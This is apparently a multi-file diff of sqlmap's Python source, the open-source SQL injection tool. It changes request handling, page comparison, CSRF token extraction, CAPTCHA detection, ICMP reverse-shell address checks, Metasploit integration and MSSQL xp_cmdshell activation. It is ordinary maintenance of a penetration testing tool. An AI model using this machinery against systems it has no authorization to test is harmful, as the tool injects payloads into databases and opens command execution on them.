except (LookupError, ValueError):
|
||||
if warn:
|
||||
warnMsg = "unknown web page charset '%s'. " % encoding
|
||||
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
|
||||
@@ -258,15 +261,16 @@ def decodePage(page, contentEncoding, contentType):
|
||||
|
||||
page = data.read()
|
||||
except Exception, msg:
|
||||
errMsg = "detected invalid data for declared content "
|
||||
errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg)
|
||||
singleTimeLogMessage(errMsg, logging.ERROR)
|
||||
if "<html" not in page: # in some cases, invalid "Content-Encoding" appears for plain HTML (should be ignored)
|
||||
errMsg = "detected invalid data for declared content "
|
||||
errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg)
|
||||
singleTimeLogMessage(errMsg, logging.ERROR)
|
||||
|
||||
warnMsg = "turning off page compression"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
warnMsg = "turning off page compression"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
kb.pageCompress = False
|
||||
raise SqlmapCompressionException
|
||||
kb.pageCompress = False
|
||||
raise SqlmapCompressionException
|
||||
|
||||
if not conf.charset:
|
||||
httpCharset, metaCharset = None, None
|
||||
@@ -330,11 +334,14 @@ def processResponse(page, responseHeaders):
|
||||
|
||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
|
||||
|
||||
if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
|
||||
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
|
||||
|
||||
if conf.parseErrors:
|
||||
msg = extractErrorMessage(page)
|
||||
|
||||
if msg:
|
||||
logger.warning("parsed DBMS error message: '%s'" % msg)
|
||||
logger.warning("parsed DBMS error message: '%s'" % msg.rstrip('.'))
|
||||
|
||||
if kb.originalPage is None:
|
||||
for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX):
|
||||
@@ -347,6 +354,16 @@ def processResponse(page, responseHeaders):
|
||||
conf.paramDict[PLACE.POST][name] = value
|
||||
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
|
||||
|
||||
if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):
|
||||
for match in re.finditer(r"(?si)<form.+?</form>", page):
|
||||
if re.search(r"(?i)captcha", match.group(0)):
|
||||
kb.captchaDetected = True
|
||||
warnMsg = "potential CAPTCHA protection mechanism detected"
|
||||
if re.search(r"(?i)<title>[^<]*CloudFlare", page):
|
||||
warnMsg += " (CloudFlare)"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
break
|
||||
|
||||
if re.search(BLOCKED_IP_REGEX, page):
|
||||
errMsg = "it appears that you have been blocked by the target server"
|
||||
singleTimeLogMessage(errMsg, logging.ERROR)
|
||||
warnMsg = "it appears that you have been blocked by the target server"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
@@ -21,6 +21,7 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING
|
||||
from lib.core.settings import DIFF_TOLERANCE
|
||||
from lib.core.settings import HTML_TITLE_REGEX
|
||||
from lib.core.settings import MIN_RATIO
|
||||
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
|
||||
from lib.core.settings import MAX_RATIO
|
||||
from lib.core.settings import REFLECTED_VALUE_MARKER
|
||||
from lib.core.settings import LOWER_RATIO_BOUND
|
||||
@@ -49,15 +50,11 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
||||
if kb.testMode:
|
||||
threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else ""
|
||||
threadData.lastComparisonPage = page
|
||||
threadData.lastComparisonCode = code
|
||||
|
||||
if page is None and pageLength is None:
|
||||
return None
|
||||
|
||||
count = 0
|
||||
|
||||
seqMatcher = threadData.seqMatcher
|
||||
seqMatcher.set_seq1(kb.pageTemplate)
|
||||
|
||||
if any((conf.string, conf.notString, conf.regexp)):
|
||||
rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page)
|
||||
|
||||
@@ -77,6 +74,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
||||
if conf.code:
|
||||
return conf.code == code
|
||||
|
||||
seqMatcher = threadData.seqMatcher
|
||||
seqMatcher.set_seq1(kb.pageTemplate)
|
||||
|
||||
if page:
|
||||
# In case of an DBMS error page return None
|
||||
if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic:
|
||||
@@ -109,59 +109,37 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
||||
elif isinstance(seqMatcher.a, unicode) and isinstance(page, str):
|
||||
seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore')
|
||||
|
||||
seq1, seq2 = None, None
|
||||
|
||||
if conf.titles:
|
||||
seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a)
|
||||
seq2 = extractRegexResult(HTML_TITLE_REGEX, page)
|
||||
if seqMatcher.a and page and seqMatcher.a == page:
|
||||
ratio = 1
|
||||
elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)):
|
||||
ratio = 1.0 * len(seqMatcher.a) / len(page)
|
||||
if ratio > 1:
|
||||
ratio = 1. / ratio
|
||||
else:
|
||||
seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a
|
||||
seq2 = getFilteredPageContent(page, True) if conf.textOnly else page
|
||||
seq1, seq2 = None, None
|
||||
|
||||
if seq1 is None or seq2 is None:
|
||||
return None
|
||||
|
||||
seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
|
||||
seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")
|
||||
|
||||
while count < min(len(seq1), len(seq2)):
|
||||
if seq1[count] == seq2[count]:
|
||||
count += 1
|
||||
if conf.titles:
|
||||
seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a)
|
||||
seq2 = extractRegexResult(HTML_TITLE_REGEX, page)
|
||||
else:
|
||||
break
|
||||
seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a
|
||||
seq2 = getFilteredPageContent(page, True) if conf.textOnly else page
|
||||
|
||||
if count:
|
||||
try:
|
||||
_seq1 = seq1[count:]
|
||||
_seq2 = seq2[count:]
|
||||
except MemoryError:
|
||||
pass
|
||||
else:
|
||||
seq1 = _seq1
|
||||
seq2 = _seq2
|
||||
if seq1 is None or seq2 is None:
|
||||
return None
|
||||
|
||||
while True:
|
||||
try:
|
||||
seqMatcher.set_seq1(seq1)
|
||||
except MemoryError:
|
||||
seq1 = seq1[:len(seq1) / 1024]
|
||||
else:
|
||||
break
|
||||
seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
|
||||
seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")
|
||||
|
||||
while True:
|
||||
try:
|
||||
seqMatcher.set_seq2(seq2)
|
||||
except MemoryError:
|
||||
seq2 = seq2[:len(seq2) / 1024]
|
||||
else:
|
||||
break
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
|
||||
ratio = round(seqMatcher.quick_ratio(), 3)
|
||||
ratio = round(seqMatcher.quick_ratio(), 3)
|
||||
|
||||
# If the url is stable and we did not set yet the match ratio and the
|
||||
# current injected value changes the url page content
|
||||
if kb.matchRatio is None:
|
||||
if (count or ratio >= LOWER_RATIO_BOUND) and ratio <= UPPER_RATIO_BOUND:
|
||||
if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
|
||||
kb.matchRatio = ratio
|
||||
logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)
|
||||
|
||||
|
||||
@@ -32,7 +32,6 @@ from lib.core.agent import agent
|
||||
from lib.core.common import asciifyUrl
|
||||
from lib.core.common import calculateDeltaSeconds
|
||||
from lib.core.common import clearConsoleLine
|
||||
from lib.core.common import cpuThrottle
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import evaluateCode
|
||||
from lib.core.common import extractRegexResult
|
||||
@@ -111,7 +110,6 @@ from lib.request.basic import processResponse
|
||||
from lib.request.direct import direct
|
||||
from lib.request.comparison import comparison
|
||||
from lib.request.methodrequest import MethodRequest
|
||||
from thirdparty.multipart import multipartpost
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
from thirdparty.socks.socks import ProxyError
|
||||
|
||||
@@ -123,7 +121,10 @@ class Connect(object):
|
||||
|
||||
@staticmethod
|
||||
def _getPageProxy(**kwargs):
|
||||
return Connect.getPage(**kwargs)
|
||||
try:
|
||||
return Connect.getPage(**kwargs)
|
||||
except RuntimeError:
|
||||
return None, None, None
|
||||
|
||||
@staticmethod
|
||||
def _retryProxy(**kwargs):
|
||||
@@ -145,7 +146,7 @@ class Connect(object):
|
||||
warnMsg = "most probably web server instance hasn't recovered yet "
|
||||
warnMsg += "from previous timed based payload. If the problem "
|
||||
warnMsg += "persists please wait for few minutes and rerun "
|
||||
warnMsg += "without flag T in option '--technique' "
|
||||
warnMsg += "without flag 'T' in option '--technique' "
|
||||
warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to "
|
||||
warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
@@ -220,8 +221,6 @@ class Connect(object):
|
||||
|
||||
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
|
||||
time.sleep(conf.delay)
|
||||
elif conf.cpuThrottle:
|
||||
cpuThrottle(conf.cpuThrottle)
|
||||
|
||||
if conf.offline:
|
||||
return None, None, None
|
||||
@@ -242,7 +241,7 @@ class Connect(object):
|
||||
referer = kwargs.get("referer", None) or conf.referer
|
||||
host = kwargs.get("host", None) or conf.host
|
||||
direct_ = kwargs.get("direct", False)
|
||||
multipart = kwargs.get("multipart", False)
|
||||
multipart = kwargs.get("multipart", None)
|
||||
silent = kwargs.get("silent", False)
|
||||
raise404 = kwargs.get("raise404", True)
|
||||
timeout = kwargs.get("timeout", None) or conf.timeout
|
||||
@@ -254,6 +253,9 @@ class Connect(object):
|
||||
crawling = kwargs.get("crawling", False)
|
||||
skipRead = kwargs.get("skipRead", False)
|
||||
|
||||
if multipart:
|
||||
post = multipart
|
||||
|
||||
websocket_ = url.lower().startswith("ws")
|
||||
|
||||
if not urlparse.urlsplit(url).netloc:
|
||||
@@ -298,20 +300,6 @@ class Connect(object):
|
||||
params = urlencode(params)
|
||||
url = "%s?%s" % (url, params)
|
||||
|
||||
elif multipart:
|
||||
# Needed in this form because of potential circle dependency
|
||||
# problem (option -> update -> connect -> option)
|
||||
from lib.core.option import proxyHandler
|
||||
|
||||
multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
|
||||
conn = multipartOpener.open(unicodeencode(url), multipart)
|
||||
page = Connect._connReadProxy(conn) if not skipRead else None
|
||||
responseHeaders = conn.info()
|
||||
responseHeaders[URI_HTTP_HEADER] = conn.geturl()
|
||||
page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
|
||||
|
||||
return page
|
||||
|
||||
elif any((refreshing, crawling)):
|
||||
pass
|
||||
|
||||
@@ -364,7 +352,7 @@ class Connect(object):
|
||||
if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING):
|
||||
headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
|
||||
|
||||
if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
|
||||
if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE):
|
||||
headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)
|
||||
|
||||
if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
|
||||
@@ -376,6 +364,9 @@ class Connect(object):
|
||||
if boundary:
|
||||
headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary)
|
||||
|
||||
if conf.keepAlive:
|
||||
headers[HTTP_HEADER.CONNECTION] = "keep-alive"
|
||||
|
||||
# Reset header values to original in case of provided request file
|
||||
if target and conf.requestFile:
|
||||
headers = OrderedDict(conf.httpHeaders)
|
||||
@@ -391,9 +382,10 @@ class Connect(object):
|
||||
|
||||
for key, value in headers.items():
|
||||
del headers[key]
|
||||
headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(value, kb.pageEncoding)
|
||||
value = unicodeencode(value, kb.pageEncoding)
|
||||
for char in (r"\r", r"\n"):
|
||||
value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value)
|
||||
headers[unicodeencode(key, kb.pageEncoding)] = value.strip("\r\n")
|
||||
|
||||
url = unicodeencode(url)
|
||||
post = unicodeencode(post)
|
||||
@@ -442,7 +434,7 @@ class Connect(object):
|
||||
requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
|
||||
|
||||
if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
|
||||
requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
|
||||
requestHeaders += "\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
|
||||
|
||||
requestMsg += "\n%s" % requestHeaders
|
||||
|
||||
@@ -451,9 +443,10 @@ class Connect(object):
|
||||
|
||||
requestMsg += "\n"
|
||||
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
if not multipart:
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
|
||||
|
||||
if conf.cj:
|
||||
for cookie in conf.cj:
|
||||
@@ -574,7 +567,8 @@ class Connect(object):
|
||||
elif conf.verbose > 5:
|
||||
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||
if not multipart:
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||
|
||||
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
|
||||
errMsg = "not authorized, try to provide right HTTP "
|
||||
@@ -615,14 +609,21 @@ class Connect(object):
|
||||
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||
warnMsg = "connection was forcibly closed by the target URL"
|
||||
elif "timed out" in tbMsg:
|
||||
singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
|
||||
conf.disablePrecon = True
|
||||
if not conf.disablePrecon:
|
||||
singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
|
||||
conf.disablePrecon = True
|
||||
|
||||
if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||
kb.responseTimes.clear()
|
||||
|
||||
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||
singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
|
||||
warnMsg = "connection timed out to the target URL"
|
||||
elif "URLError" in tbMsg or "error" in tbMsg:
|
||||
warnMsg = "unable to connect to the target URL"
|
||||
match = re.search(r"Errno \d+\] ([^>]+)", tbMsg)
|
||||
if match:
|
||||
warnMsg += " ('%s')" % match.group(1).strip()
|
||||
elif "NTLM" in tbMsg:
|
||||
warnMsg = "there has been a problem with NTLM authentication"
|
||||
elif "BadStatusLine" in tbMsg:
|
||||
@@ -641,7 +642,7 @@ class Connect(object):
|
||||
else:
|
||||
warnMsg = "unable to connect to the target URL"
|
||||
|
||||
if "BadStatusLine" not in tbMsg:
|
||||
if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)):
|
||||
warnMsg += " or proxy"
|
||||
|
||||
if silent:
|
||||
@@ -700,7 +701,8 @@ class Connect(object):
|
||||
elif conf.verbose > 5:
|
||||
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||
if not multipart:
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||
|
||||
return page, responseHeaders, code
|
||||
|
||||
@@ -788,9 +790,20 @@ class Connect(object):
|
||||
value = agent.replacePayload(value, payload)
|
||||
else:
|
||||
# GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
|
||||
if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
|
||||
payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
|
||||
value = agent.replacePayload(value, payload)
|
||||
if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
|
||||
skip = False
|
||||
|
||||
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
|
||||
if kb.cookieEncodeChoice is None:
|
||||
msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282
|
||||
choice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N')
|
||||
kb.cookieEncodeChoice = choice.upper().strip() == "Y"
|
||||
if not kb.cookieEncodeChoice:
|
||||
skip = True
|
||||
|
||||
if not skip:
|
||||
payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
|
||||
value = agent.replacePayload(value, payload)
|
||||
|
||||
if conf.hpp:
|
||||
if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
|
||||
@@ -827,9 +840,13 @@ class Connect(object):
|
||||
|
||||
if PLACE.GET in conf.parameters:
|
||||
get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value
|
||||
elif place == PLACE.GET: # Note: for (e.g.) checkWaf() when there are no GET parameters
|
||||
get = value
|
||||
|
||||
if PLACE.POST in conf.parameters:
|
||||
post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value
|
||||
elif place == PLACE.POST:
|
||||
post = value
|
||||
|
||||
if PLACE.CUSTOM_POST in conf.parameters:
|
||||
post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value
|
||||
@@ -858,15 +875,23 @@ class Connect(object):
|
||||
if conf.csrfToken:
|
||||
def _adjustParameter(paramString, parameter, newValue):
|
||||
retVal = paramString
|
||||
match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
|
||||
match = re.search("%s=[^&]*" % re.escape(parameter), paramString)
|
||||
if match:
|
||||
retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
|
||||
retVal = re.sub(match.group(0), "%s=%s" % (parameter, newValue), paramString)
|
||||
else:
|
||||
match = re.search("(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString)
|
||||
if match:
|
||||
retVal = re.sub(match.group(0), "%s%s" % (match.group(1), newValue), paramString)
|
||||
return retVal
|
||||
|
||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
|
||||
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
|
||||
|
||||
if not token:
|
||||
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
|
||||
token = match.group(1) if match else None
|
||||
|
||||
if not token:
|
||||
if conf.csrfUrl != conf.url and code == httplib.OK:
|
||||
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
|
||||
@@ -958,7 +983,7 @@ class Connect(object):
|
||||
|
||||
while True:
|
||||
try:
|
||||
compiler.parse(conf.evalCode.replace(';', '\n'))
|
||||
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
|
||||
except SyntaxError, ex:
|
||||
original = replacement = ex.text.strip()
|
||||
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||
|
||||
@@ -87,8 +87,9 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
||||
|
||||
if not success:
|
||||
errMsg = "can't establish SSL connection"
|
||||
if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.10"):
|
||||
errMsg += " (please retry with Python >= 2.7.10)"
|
||||
# Reference: https://docs.python.org/2/library/ssl.html
|
||||
if distutils.version.LooseVersion(PYVERSION) < distutils.version.LooseVersion("2.7.9"):
|
||||
errMsg += " (please retry with Python >= 2.7.9)"
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
|
||||
class HTTPSHandler(urllib2.HTTPSHandler):
|
||||
|
||||
@@ -284,7 +284,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
|
||||
|
||||
outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
|
||||
|
||||
return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None
|
||||
return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None
|
||||
|
||||
def _goBooleanProxy(expression):
|
||||
"""
|
||||
@@ -432,7 +432,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||
|
||||
if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found:
|
||||
kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", expression)) if re.search(r"(?i)SELECT.+FROM", expression) else None
|
||||
kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", re.sub(r"(?i)(\w+)\(.+\)", r"\g<1>", expression))) if re.search(r"(?i)SELECT.+FROM", expression) else None
|
||||
|
||||
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME):
|
||||
kb.technique = PAYLOAD.TECHNIQUE.TIME
|
||||
|
||||
@@ -6,6 +6,8 @@ See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
import socket
|
||||
import time
|
||||
|
||||
from extra.icmpsh.icmpsh_m import main as icmpshmaster
|
||||
@@ -54,15 +56,29 @@ class ICMPsh:
|
||||
if self.localIP:
|
||||
message += "[Enter for '%s' (detected)] " % self.localIP
|
||||
|
||||
while not address:
|
||||
address = readInput(message, default=self.localIP)
|
||||
valid = None
|
||||
while not valid:
|
||||
valid = True
|
||||
address = readInput(message, default=self.localIP or "")
|
||||
|
||||
try:
|
||||
socket.inet_aton(address)
|
||||
except socket.error:
|
||||
valid = False
|
||||
finally:
|
||||
valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None
|
||||
|
||||
if conf.batch and not address:
|
||||
raise SqlmapDataException("local host address is missing")
|
||||
elif address and not valid:
|
||||
warnMsg = "invalid local host address"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return address
|
||||
|
||||
def _prepareIngredients(self, encode=True):
|
||||
self.localIP = getattr(self, "localIP", None)
|
||||
self.remoteIP = getattr(self, "remoteIP", None)
|
||||
self.lhostStr = ICMPsh._selectLhost(self)
|
||||
self.rhostStr = ICMPsh._selectRhost(self)
|
||||
|
||||
|
||||
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
import os
|
||||
import re
|
||||
import select
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
@@ -47,8 +48,6 @@ from lib.core.subprocessng import recv_some
|
||||
|
||||
if IS_WIN:
|
||||
import msvcrt
|
||||
else:
|
||||
from select import select
|
||||
|
||||
class Metasploit:
|
||||
"""
|
||||
@@ -550,7 +549,7 @@ class Metasploit:
|
||||
# Probably the child has exited
|
||||
pass
|
||||
else:
|
||||
ready_fds = select([stdin_fd], [], [], 1)
|
||||
ready_fds = select.select([stdin_fd], [], [], 1)
|
||||
|
||||
if stdin_fd in ready_fds[0]:
|
||||
try:
|
||||
@@ -598,7 +597,7 @@ class Metasploit:
|
||||
else:
|
||||
proc.kill()
|
||||
|
||||
except (EOFError, IOError):
|
||||
except (EOFError, IOError, select.error):
|
||||
return proc.returncode
|
||||
|
||||
def createMsfShellcode(self, exitfunc, format, extra, encode):
|
||||
|
||||
@@ -217,8 +217,6 @@ class Web:
|
||||
|
||||
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
|
||||
directory = "/%s" % directory
|
||||
else:
|
||||
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
|
||||
|
||||
if not directory.endswith('/'):
|
||||
directory += '/'
|
||||
|
||||
@@ -45,7 +45,7 @@ class Xp_cmdshell:
|
||||
def _xpCmdshellCreate(self):
|
||||
cmd = ""
|
||||
|
||||
if Backend.isVersionWithin(("2005", "2008", "2012")):
|
||||
if not Backend.isVersionWithin(("2000",)):
|
||||
logger.debug("activating sp_OACreate")
|
||||
|
||||
cmd = getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
|
||||
@@ -56,7 +56,7 @@ class Xp_cmdshell:
|
||||
|
||||
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
|
||||
|
||||
if Backend.isVersionWithin(("2005", "2008")):
|
||||
if not Backend.isVersionWithin(("2000",)):
|
||||
cmd += ";RECONFIGURE WITH OVERRIDE"
|
||||
|
||||
inject.goStacked(agent.runAsDBMSUser(cmd))
|
||||
@@ -83,10 +83,10 @@ class Xp_cmdshell:
|
||||
return cmd
|
||||
|
||||
def _xpCmdshellConfigure(self, mode):
|
||||
if Backend.isVersionWithin(("2005", "2008")):
|
||||
cmd = self._xpCmdshellConfigure2005(mode)
|
||||
else:
|
||||
if Backend.isVersionWithin(("2000",)):
|
||||
cmd = self._xpCmdshellConfigure2000(mode)
|
||||
else:
|
||||
cmd = self._xpCmdshellConfigure2005(mode)
|
||||
|
||||
inject.goStacked(agent.runAsDBMSUser(cmd))
|
||||
|
||||
@@ -111,8 +111,8 @@ class Xp_cmdshell:
|
||||
errMsg += "storing console output within the back-end file system "
|
||||
errMsg += "does not have writing permissions for the DBMS process. "
|
||||
errMsg += "You are advised to manually adjust it with option "
|
||||
errMsg += "--tmp-path switch or you will not be able to retrieve "
|
||||
errMsg += "the commands output"
|
||||
errMsg += "'--tmp-path' or you won't be able to retrieve "
|
||||
errMsg += "the command(s) output"
|
||||
logger.error(errMsg)
|
||||
elif isNoneValue(output):
|
||||
logger.error("unable to retrieve xp_cmdshell output")
|
||||
|
||||
@@ -5,11 +5,9 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
import threading
|
||||
import time
|
||||
|
||||
from extra.safe2bin.safe2bin import safechardecode
|
||||
from extra.safe2bin.safe2bin import safecharencode
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import Backend
|
||||
@@ -20,13 +18,11 @@ from lib.core.common import decodeIntToUnicode
|
||||
from lib.core.common import filterControlChars
|
||||
from lib.core.common import getCharset
|
||||
from lib.core.common import getCounter
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import goGoodSamaritan
|
||||
from lib.core.common import getPartRun
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import hashDBWrite
|
||||
from lib.core.common import incrementCounter
|
||||
from lib.core.common import randomInt
|
||||
from lib.core.common import safeStringFormat
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.data import conf
|
||||
@@ -44,7 +40,6 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
|
||||
from lib.core.settings import INFERENCE_GREATER_CHAR
|
||||
from lib.core.settings import INFERENCE_EQUALS_CHAR
|
||||
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
|
||||
from lib.core.settings import MIN_TIME_RESPONSES
|
||||
from lib.core.settings import MAX_BISECTION_LENGTH
|
||||
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
|
||||
from lib.core.settings import NULL
|
||||
|
||||
@@ -61,6 +61,10 @@ def dnsUse(payload, expression):
|
||||
